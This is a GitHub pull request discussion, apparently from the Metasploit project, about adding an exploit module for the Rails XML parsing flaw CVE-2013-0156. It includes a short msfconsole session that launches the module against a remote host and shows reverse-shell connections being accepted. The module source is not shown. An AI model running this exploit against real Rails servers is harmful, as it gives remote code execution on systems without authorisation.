Add exploit module for CVE-2013-0156 #1281

wants to merge 3 commits into



espes commented Jan 10, 2013

For no reason other than to beat you to it ;)
(hdmoore claimed they were pushing their own module in a couple hours time)

Tested with ruby 1.9.3 on Rails 3.2.10. Can probably be made to work on older ruby+rails versions, particularly using Gem::Requirement restricts it to 1.9.?.

A variation of @benmmurphy's payload is used, which he may or may not be comfortable with. I figure it's not too difficult to come up with independently and my/@charliesome's hack would just be replaced by something similar eventually.

msf > use exploits/unix/webapp/rails_xml_parsing_exec
msf  exploit(rails_xml_parsing_exec) > set RHOST
msf  exploit(rails_xml_parsing_exec) > exploit

[*] Started reverse double handler
[*] Sent exploit request
[*] Accepted the first client connection...
[*] Accepted the second client connection...

hdm commented Jan 10, 2013

Thanks! Closing this out and will merge your work into the module in progress that uses ARCH_RUBY payloads

haha this is going to be a shitshow...



hdm commented Jan 10, 2013

See #1282 for the merged version of this module

hdm closed this Jan 10, 2013

Karimus commented Jan 11, 2013

incoming shitstorm expected :)
